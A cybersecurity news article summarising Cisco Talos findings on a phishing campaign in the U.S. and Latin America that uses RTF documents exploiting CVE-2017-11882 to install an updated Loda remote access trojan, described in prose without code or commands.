Threat Management, Malware, Phishing

Phishing campaign targets Americas with new variant of Loda RAT


Researchers have observed a new malware campaign that's been targeting the U.S., Argentina, Brazil and Costa Rica with an updated variant of the Loda RAT remote access trojan.

In a company blog post on Wednesday, Cisco Talos said that since at least the last quarter of 2019, the campaign has been using malicious websites to host malicious documents that are used in a multi-step infection chain designed to bypass email filters and deliver Loda version 1.1.1.

This new version of Loda functions similarly to previous iterations, but with a few notable differences, states Talos. Changes including a new form a string encoding for obfuscation, multiple persistence mechanisms to help the malware survive reboots, and the leveraging of Windows Management Instrumentation (WMI) to list out antivirus solutions running on the victim machine. Due to the campaign's obfuscation techniques, detection rates have so far been low, the blog post adds.

The perpetrators' choice of attack vector has been phishing emails, including one email shown in the blog post that was written in Spanish and posed as an urgent reservation request. The emails contain an attached first-stage document, which points to a secondary document saved in Rich Text Format (RTF). The secondary document includes an obfuscated OLE object which leverages the Windows Office code execution exploit CVE-2017-11882 to download and execute an MSI file containing Loda.

Written in AutoIT, Loda dates back to 2017 and is typically used to spy on victims due to its ability to steal browser-based usernames, password and cookies; perform keylogging; and secret record sound and take screenshots.

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.